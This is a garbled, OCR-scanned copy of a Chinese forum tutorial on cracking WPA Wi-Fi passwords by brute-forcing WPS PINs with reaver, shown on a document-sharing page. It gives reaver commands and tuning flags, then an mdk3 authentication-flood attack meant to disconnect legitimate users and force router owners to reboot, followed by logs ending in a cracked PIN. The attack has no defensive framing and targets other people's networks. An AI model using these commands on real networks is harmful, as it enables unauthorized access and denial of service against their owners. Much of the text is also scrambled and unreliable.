




版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請(qǐng)進(jìn)行舉報(bào)或認(rèn)領(lǐng)
文檔簡(jiǎn)介
1、破解 WPA時(shí),PIN出現(xiàn)死循環(huán)處理方法。(吾就愛無(wú)線論壇)如下面這個(gè)例子,一開始,或者破解一段時(shí)間后出來(lái)PIN無(wú)限循環(huán):wltnO monO B0:A1:D7:EB:31:FEfailure;failuresstartfailure-;faille;me方式喜戶Si MACL'Jfaj Jur«failuresstartfieaver傅止上詛岀WPA2_6d7 61 Afl:BH;E4I?】1in 4 revTrying pin 4000000( UflRNING: 25 successive Tryitig pin 40000006 UfiRNINt: 25 succes
2、siveTrying pin 4000000CUARNIN&:茁 successiveTrying pin 4000000(UARNING: 25 succnsiveTrying pin 4000000UflRNINC* 25 $ucce$?iv#TriM ptn 4OOOO0OCUARN1N&: 25 successive0,00; coflplete 0 2012-06-18 OQ;2O:47 (0 $econds/pin) Trying pin 4QOOOOCCUARH1N&: 25 successiveTrying pin 40000006 弭RNING:專 s
3、ucceiveTrying pin 40000006 URRMINQ: 25 successiveTrylrq ptn 4000000(1UARNING: 25 successiveUARN1N& 10 filled connftctions Trying pin 4000000( 刃"殆Infl白tor L0cedingB.# d * R min*dwep-gtk-3D412wlanO monO KhAI :D7:EB31U.(吾就愛無(wú)線論壇 )本人經(jīng)過多次實(shí)驗(yàn)最后總結(jié)了解決的辦法:Required Argume nts:-i, -i nterface=<wla n&
4、gt; Name of the mon itor-mode in terface to use網(wǎng)卡的監(jiān)視接口,通常是mo n0-b, -bssid=<mac> BSSID of the target APAP的MAC地址(吾就愛無(wú)線論壇 )Optional Arguments:-m, -mac=<mac> MAC of the host system指定本機(jī)MAC地址,在AP有MAC過濾的時(shí)候需要使用-e, -essid=<ssid> ESSID of the target AP路由器的ESSID, 般不用指定-c, -channel=<channel
5、> Set the 802.11 channel for the interface (implies -f) 信號(hào)的頻道,如果不指定會(huì)自動(dòng)掃描-o, -out-file=<file> Send output to a log file stdout 標(biāo)準(zhǔn)輸出到文件-s, -session=<file> Restore a previous session file 恢復(fù)進(jìn)程文件-C, -exec=<command> Execute the supplied command upon successful pin recovery pin 成功后執(zhí)行命
6、令-D, -daemonize Daemonize reaver設(shè)置 reaver 成 Daemon-a, -auto Auto detect the best advanced options for the target AP 對(duì)目標(biāo) AP 自動(dòng)檢測(cè)高級(jí)參數(shù)-f, -fixed Disable channel hopping 禁止頻道跳轉(zhuǎn)-5, -5ghz Use 5GHz 802.11 channels使用 5G 頻道-v, -verbose Display non-critical warnings (-vv for more) 顯示不重要警告信息 -vv 可以顯示更多-q, -qui
7、et Only display critical messages 只顯示關(guān)鍵信息-h, -help Show help顯示幫助( 吾就愛無(wú)線論壇 )Advanced Options:-p, -pin=<wps pin> Use the specified 4 or 8 digit WPS pin直接讀取psk (本人測(cè)試未成功,建議用網(wǎng)卡自帶軟件獲取)-d, -delay=<seconds> Set the delay between pin attempts 1pin 間延時(shí),默認(rèn) 1 秒,推薦設(shè) 0-l, -lock-delay=<seconds> S
8、et the time to wait if the AP locks WPS pin attempts 60 AP鎖定WPS后等待時(shí)間-g, -max-attempts=<num> Quit after num pin attempts 最大 pin 次數(shù)-x, -fail-wait=<seconds> Set the time to sleep after 10 unexpected failures 010 次意外失敗后等待時(shí)間,默認(rèn) 0 秒-r, -recurring-delay=<x:y> Sleep for y seconds every x p
9、in attempts 每 x 次 pin 后等待 y 秒-t, -timeout=<seconds> Set the receive timeout period 5 收包超時(shí),默認(rèn) 5 秒-T, -m57-timeout=<seconds> Set the M5/M7 timeout period 0.20 M5/M7 超時(shí),默認(rèn) 0.2 秒-A, -no-associate Do not associate with the AP (association must be done by another application)不連入AP (連入過程必須有其他程序
10、完成)-N, -no-nacks Do not send NACK messages when out of order packets are received 不發(fā)送 NACK 信息(如果一直 pin 不動(dòng),可以嘗試這個(gè)參數(shù)) -S, -dh-small Use small DH keys to improve crack speed 使用小 DH 關(guān)鍵值提高速度(推薦使用)-L, -ignore-locks Ignore locked state reported by the target AP 忽略目標(biāo) AP 報(bào)告的鎖定狀態(tài)-E, -eap-terminate Terminate e
11、ach WPS session with an EAP FAIL packet每當(dāng)收到EAP失敗包就終止WPS進(jìn)程-n, -nack Target AP always sends a NACK Auto對(duì)目標(biāo)AP總是發(fā)送NACK,默認(rèn)自動(dòng)-w, -win7 Mimic a Windows 7 registrar False 模擬 win7 注冊(cè),默認(rèn)關(guān)閉(吾就愛無(wú)線論壇 ) 個(gè)人心得 對(duì)一個(gè)即剛開始pin的時(shí)候打開-vv參數(shù),如果順利,就中斷,然后改成-v繼續(xù)pin,反正進(jìn) 度是可以保存的reaver -i mon0 -b xx:xx:xx:xx:xx:xx -d 0 -vv -a -S如果一
12、直 pin 不動(dòng),嘗試加 -N 參數(shù)-Nreaver -i mon0 -b xx:xx:xx:xx:xx:xx -d 0 -vv -a -S(吾就愛無(wú)線論壇 )AP 洪水攻擊1、打氣筒 mdk3 攻擊模式操作方法首先檢測(cè)網(wǎng)卡:ifconfig -a然后模擬端口:airmon-ng start wlan0接下來(lái)用:airodump-ng mon0掃描 ap 找到你 pin 死的路由器 mac用 mdk3 做身份驗(yàn)證攻擊mdk3 mon0 a -a mac (被 pin 死的路由器的 mac)身份驗(yàn)證攻擊效果說明:此攻擊是針對(duì)無(wú)線 AP 的洪水攻擊,又叫做身份驗(yàn)證攻擊。其原理就是向 AP 發(fā)動(dòng)大量
13、的虛假 的鏈接請(qǐng)求,這種請(qǐng)求數(shù)量一旦超 過了無(wú)線AP所能承受的范圍,AP就會(huì)自動(dòng)斷開現(xiàn)有鏈接, 使合法用戶無(wú)法使用無(wú)線網(wǎng)絡(luò)。迫使路由主人重啟路由器。說明:此命令功能強(qiáng)大,使用錯(cuò)誤會(huì)造成所有 ap 不能使用, 請(qǐng)指定 mac 地址 ,然后使用,其余命 令不要亂試。你要使用此命令的其他參數(shù),請(qǐng)?jiān)敿?xì)閱讀此命令參數(shù)詳解2、CDlinux mdk3 攻擊模式操作方法首先進(jìn)入CDIinux,打開水滴或者打氣筒搜索 pin死的MAC地址(直接打開螃蟹或者 3070驅(qū)動(dòng)搜索無(wú)線 MAC 地址也 OK)。然后點(diǎn)擊左下角 CDlnux圖標(biāo),依次打開無(wú)線安全mdk3-v61尸尸f r亠F L加更方式EU17.2F1
14、4:E6:E4:/WPA2VLilw-rw逛攆replayng 21:1451Iny 31 trpiEay ri >ryreplay ng 5cowparty-4.6佩血rhff網(wǎng)絡(luò)嗅援C ettercapFeedi ngBorbeInflator LO kismev20!0-R1 macchanger MAC 改夠 mdk3啟動(dòng)程序“J終端3交件管理器 3網(wǎng)緒測(cè)覽襦赫公 ft至媒體 訥附件 ;圖形圖像 網(wǎng)蠟關(guān)于 CDIinux關(guān)于對(duì)“TWiyWfUn- tcpdump- 運(yùn)# 門巾-CWxHydra為你pin死的路由的MAC進(jìn)入 mdk3后輸入命令 mdk3 monO a -a 40:
15、16:9F:*:2C:B2(40:16:9F:*:2C:B2注意空格和大小寫)a - Authentication BaS modeSends authentication frciKies to all APs found in 廣Too much client© Freeze or reset sone fiPs*p - Basic probing $nd ESSID Bruteforce mockProbes AP and check for answerj useful for 匚Hecking if SSID has been correctly decloaked or
16、if AP is in your adaptors sending range SSID Bruteforcing is iso possible with this testd - Beauthenticat1on / Eisassociation Amok ModeKicks everybody found froia AFm - Michael shutdown exploitation (TKIP)Cance1s al 1 traffic continuouslyx 802.1X testsu - UrDS/UIPS ConfusionConfuse/Abuse Intrusion D
17、etection ard Prevention Systemsf HAC fi比bruteforce wodeThis test uses $ list of known cliert MAC Adresses tries to authenticate them to the given AP while dynamically changing its response tineaut for best perFornancet It cxirr-ently mrks only on APs who deny an open authentication request properly9
18、- UFA Eowngrde test* 比?ttions and APs sending UPA encrypted packets* dkt:i thisij can check if the syEadmin ui 11 try setting his 匚丄jw亠 斗二 J 二一朋MJ “汩4+誡d弊歲盤切雋扇鴦總pin死的路由是回車后進(jìn)入攻擊模式,時(shí)間不要太長(zhǎng),最多半分鐘就可以關(guān)閉對(duì)話框然后重新掃描網(wǎng)絡(luò)看 不是已經(jīng)不在了。等待主人重啟吧丿 mdk3-v6二 口電Connecting CkentJ 671C6:69:73:51汗F to target APt 40tt6:9Fdi|:2C
19、tB2fiP 40:1B:9fA:2C:B2 Is respondinsfVConnecting Cnent:4E:35:6L;J5:55:D1totargetAP:4C:16:9F:M:2C:B2Connecting Client;AA;FA:06:24:E2t06totargetAP+40;16:9F:2C;B2Connecting Client:01:96:17:94:2A:00totargetAP:40:16:9F:®:2C:B2AP 4O:1£:9F#:2C:B2 se匕帕 to be INVULNERABLE!1Device is sti11 respondin
20、g with 500 clients connected! 備Connecting Client: C7:51:E4:E7:6E:27 to target AP: 40:16i9F:R:2C:B2Connectina Client: B5:6E:32:C4:FF:05 to target AP: 40:16:9F:V:2C:12AP 40:16:SFft2C:B2 如馴s to be INVILNERABLE!wDevice is xtn1 responding with 1000 clients connected!Connecting Client: 45:FC:25:7:3C:D9 to
21、 target AP: 4O:16:9F1®2C:B2Connecting Client: 73:DH:C4:5C:OC:1E to target AP: 40:1S:3F:k2C:B2Connecting CDent: 17:99;7E:7i:F5:DD to target AP: 40: 16:9F:B2AP 40:16:9F»2C:B2 sms to be INVULNERABLE!Device is st Hl responding with 1500 cl ients connected >95Connecting Client: 0O:3E:65:67:7
22、1:89 to target AP: 4G:16:9F»hC:B2Connecting Client; 6E:B4:66:9E:ABi3D to target AP: 40;16:9F:«:2C:B2Connecting Client: EE:OA:18:8F:A8:00 to target AP: 40:l£:9F:ft2C:E2AP 侖:1 就下剪葛翠悄 to be INVULNERABLE!fEf-jijf 用'己with 2000 clients connected! J|Conn&ctiho Li lent.:切葉.衿:日匸:EEl:匚A
23、 to target APt 40:tE:9F#:21:班Packets sent:190 packetsZsec*非CDLinux可以在這里啟動(dòng)命令輸入框HornethunarRsv&r過運(yùn)行程序雙席摂搶器 袁件右理器 陽(yáng)件聞?wù)樒?W阿堵瀏覽番m附伸 2互聯(lián)網(wǎng)A si用'jftSt遏關(guān)于CDlinux養(yǎng)于對(duì)口minidwep-gtkart NetWork腌訐IQQWPSQackGUZ GPartedIwOlskfiHiHQ 'f ThMmr文伸存理甜. SCDImux亍出鬲害 匕任富晉鋰器ftopNetWoifk=3 皿 集腐琨序-超堀用戶楓式14;421、只有客戶端
24、在線時(shí)進(jìn)行攻擊才可能達(dá)到迫使重啟目的,信號(hào)越強(qiáng),效果越佳。2、 每次攻擊最好不超5min,否則卡死(看機(jī)器配置),稍停 1min在進(jìn)行攻擊,連續(xù)攻擊三 次應(yīng)該就可以了!8C210A pin 重碼或者pin死路由器的解決辦法6:C 3:DATP LINWPA2WPA14:E6:E4:78:CC:54MERCUWPA2WPA信道4:E6:E436:D4:02PC30:8C hinaNeWPA/WPA224ngA停止n5nqnqE退岀com我驗(yàn)證貌似有效)OxOSLLtrying last pinwlanO RalinkRT2B70/3070 rt2BOOusb - phy7AircplayAirc
25、playAircplsyAircplayAireplayAircplayC;21:OA:CC:FE:Oa TP-LINK常的嚴(yán)重,今天中午放棄 N次,今晚在小試一下,加了參數(shù)后,大減少重碼,堅(jiān)持就是勝利,往下看。今天起床在看,發(fā)現(xiàn)又出來(lái)了,繼續(xù)拼,發(fā)現(xiàn),重碼非常非看看我重碼拼死后,的時(shí)候15:23:12->Utointp726 WPA2WPAEC:17:2F:46:E1:32_LOL«M»_-70_1_WPA2WPA_wps8C:21:0A;79:84:54 TP-LINK 7984BM-576 WPA2WPA-39_11_WPA2_wp_!厶!詁i - *祐(cod
26、e: 0x025 / re-tr 拼死路由器后,整整一晚上沒有在找到這個(gè)信號(hào) ,Reaver (code:CTrHijng Pin 37312138?SendTng EHFOL S1hk1"requestReceived identity requestSending identity responseReceived Ml nessaasSending H2 messageReceived M3 messageSending M4 nessageReceived nessageSending M6 messagefReceived WSC NACK衛(wèi)ending USC 懈比一.T
27、pjingn 37312145Sending kblPUL SIHNI requestReceived identity requestSending identity responseReceived Ml messageSending M2 message'.lODfiTjtir 4 Q-r- jf ikiA * 詢巳口必 occurredreaver mlnidwep-gtkTndina MSC NACKUPS t廣占弊白亡T icFL F白i丄色tXmlnidwep-gtk-301221-皤無(wú)蛛網(wǎng)卡路由MAC名稱強(qiáng)度信詛加超方式客戶KMACI ElimWHA2WHA 4 fl.
28、WPA2WPZAttack Ctmmand (set th& options9u want below, withoLit "-w";I:reader -ii nonS -b 8C:21:0A:79u-a -c S -e "TP-LiNK7gr_S -uu -S _nUPS transaction failed (codel 0x03)re-trying last pin4Trying pin 37318840Sending EAPOL START requestReceived identity requestSending identity respo
29、nseReceived Ml nessgeSending H2 messageReceived H3 nesseSending M4 messageReceived M3 nessgeSending USC NACKSending USC NACKWPS transaction failed (code: 0x03), re-trying last pin 98,96 complete 血 2012-09-1G 02;45:53 (6 secands/pin) Tryir)g pin 3731EI840Sending E9P0L START requestReceived identity r
30、equestSending identit responseReceived Ml怖亡站ag亡Sending M2 rnessaee 歙列躋Send i疥 詒匚 CQfTJUPS transaction i ailea (codeT 0x03)T re-trying last pinReceived MlSending USC NACKSeriding MSC NACKUPS transactior failed (code: 0x03)re-trying last pinTrying pin 37318840Sendine EAPOL START requestReceived identi
31、ty requestSending identity responseReceived Ml MessageSending H2 menageReceived Ml messageSending USE NACKSending USC NACKWPS transaction failed (code: 0x03L re-trying last pinTrying pin 37318340Sending EAPOL START requestReceived identity requestSending identity response Received Ml massageSending
32、N2 message 血“ding MB m莢夠看到了吧,重碼,不過,是偶偶的了,加了參數(shù)后,不會(huì)像昨天和今天上午那樣 ,一直重碼一個(gè)碼不動(dòng)了 在往 下看,奇跡出現(xiàn)了。I, ! J M aiK-CVUL-lUII I dl JCU! tUUC,. VAV-J1/ r I 匸 VI 111ld-3>- $丄"+ 96J9SK complete 2012-OS-18 02:46:03 (G seconds/pin)+ Trying pin 37318840j+ Sending EAPOL ST AFT request+ Received identity request+ Send
33、ing identity response+ Reuived ItL 馳雲(yún)令應(yīng)+ Snd;ng M2 message+ H®«ived K3 Message+ Sending M4 message+ Received M5 Resssge+ Sending MG message+ Received If? message+ Sending USC NACK+ Sending USE NACK+ Pin cracked m 5857 seconds+ UPS PIN; 8373aMPPres® aiTg k旳 tp 色刃丁Pin碼重復(fù)出現(xiàn)死循環(huán)解決辦法1. xiaopan
溫馨提示
- 1. 本站所有資源如無(wú)特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請(qǐng)下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請(qǐng)聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁(yè)內(nèi)容里面會(huì)有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
- 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
- 5. 人人文庫(kù)網(wǎng)僅提供信息存儲(chǔ)空間,僅對(duì)用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對(duì)用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對(duì)任何下載內(nèi)容負(fù)責(zé)。
- 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請(qǐng)與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶因使用這些下載資源對(duì)自己和他人造成任何形式的傷害或損失。
最新文檔
- 小兒腹瀉的治療原則及護(hù)理
- 綠色聯(lián)盟遠(yuǎn)程安全評(píng)估系統(tǒng)-客戶培訓(xùn)-副本
- 教育培訓(xùn)機(jī)構(gòu)銷售話術(shù)
- 護(hù)理技術(shù)基本操作
- 辛棄疾介紹課件
- 中等職業(yè)技術(shù)學(xué)院口腔醫(yī)學(xué)技術(shù)專業(yè)人才培養(yǎng)方案
- 2024-2025學(xué)年統(tǒng)編版道德與法治九年級(jí)上第一學(xué)期期末檢測(cè)卷(含答案)
- 醫(yī)院醫(yī)用耗材培訓(xùn)
- 鋼筋工三級(jí)理論考核試題題庫(kù)及答案
- 中國(guó)證券金融科技行業(yè)發(fā)展現(xiàn)狀及前景動(dòng)態(tài)研究報(bào)告2025-2030年
- 科技論文寫作課件(原創(chuàng))
- 員工培訓(xùn)需求征集表
- 雞蛋出廠檢驗(yàn)報(bào)告
- SAP的聯(lián)產(chǎn)品和副產(chǎn)品
- 2023年高考熱點(diǎn)作文素材:20個(gè)人物素材及作文運(yùn)用段落
- 《藝術(shù)學(xué)概論考研》課件藝術(shù)創(chuàng)作論
- 五只鴨子課件
- 上海大學(xué)431金融綜合真題收集
- 醫(yī)藥企業(yè)人力資源管理創(chuàng)新案例
- T∕ZZB 2449-2021 預(yù)應(yīng)力鋼筒混凝土管
- 施工現(xiàn)場(chǎng)質(zhì)量安全生產(chǎn)管理體系報(bào)審表表
評(píng)論
0/150
提交評(píng)論